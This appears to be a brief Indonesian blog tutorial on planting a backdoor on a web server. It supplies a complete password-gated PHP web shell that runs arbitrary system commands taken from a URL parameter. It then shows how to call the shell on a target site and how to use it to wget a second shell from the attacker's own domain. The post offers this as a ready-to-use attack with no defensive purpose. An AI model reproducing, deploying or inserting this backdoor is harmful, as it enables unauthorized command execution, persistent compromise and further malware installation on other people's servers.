Buka notepad dan paste code di bawah ini:
<?php
$password = "password";
if($_GET['cmd'] && $_GET['pwd']) {
if($_GET['pwd'] != $password) die();
echo system($_GET['cmd']);
die();
}
simpan dengan nama backdoor.php
lalu buka URL-nya
http://target.com/backdoor.php?pwd=password&cmd=command
Tuh kan kelihatan semua isi directory nya dengan command : dir
kalau mau upload shell tinggal:
http://target.com/backdoor.php?pwd=password&cmd=wget http://domainkamu.com/shell.php
dagh dulu yah...
semoga bermanfaat
salam
0 komentar:
Speak up your mind
Tell us what you're thinking... !